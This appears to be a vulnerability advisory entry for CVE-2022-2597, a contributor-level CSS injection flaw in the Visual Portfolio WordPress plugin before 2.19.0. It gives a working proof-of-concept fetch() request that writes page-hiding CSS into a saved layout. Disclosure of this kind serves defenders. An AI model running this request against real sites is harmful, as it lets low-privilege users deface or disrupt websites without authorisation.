Lucene search
Krzysztof ZającWPEX-ID:3FFCEE7C-1E03-448C-8006-A9405658CDB7HistoryAug 15, 2022 - 12:00 a.m.
Visual Portfolio < 2.19.0 - Contributor+ CSS Injection
2022-08-1500:00:00
Krzysztof Zając
169
0.001 Low
EPSS
Percentile
24.8%
The plugin does not have proper authorisation checks in some of its REST endpoints, allowing users with a role as low as contributor to call them and inject arbitrary CSS in arbitrary saved layouts
The post_id is the ID of a saved layout
As a contributor, get a REST nonce via https://example.com/wp-admin/admin-ajax.php?action=rest-nonce
Execute the below command (replacing the _wpnonce value by the nonce retrieved above) in the web developer console of the browser (while still being logged in as a contributor):
fetch('/?rest_route=/visual-portfolio/v1/update_layout&_wpnonce=XXXX&post_id=17&data[vp_custom_css]=body{background-image:url(data://image/gif;base64,R0lGODdhKAAoAIABAAAAAP///ywAAAAAKAAoAAACX4yPqcvtD6OctNqLs968GwB4DkheJUSeUxqObCu98CJTtZvaL6quucjoAYfEovGI9M2MrJjwccM9G9FglXpVyJa0LW9n9X635Gy4jOZK02YoW1x5NzNytYWdzOv3/GIBADs=);}div{display:none !important};', {
method: 'POST',
}).then(response => response.text())
.then(data => console.log(data));Related
patchstack
patchstack
cve
cve
CVE-2022-2597
2022-09-05 13:15:08
cvelist
cvelist
CVE-2022-2597 Visual Portfolio < 2.19.0 - Contributor+ CSS Injection
2022-09-05 12:35:21
prion
prion
Design/Logic Flaw
2022-09-05 13:15:00
wpvulndb
wpvulndb
Visual Portfolio < 2.19.0 - Contributor+ CSS Injection
2022-08-15 00:00:00
nvd
nvd
CVE-2022-2597
2022-09-05 13:15:08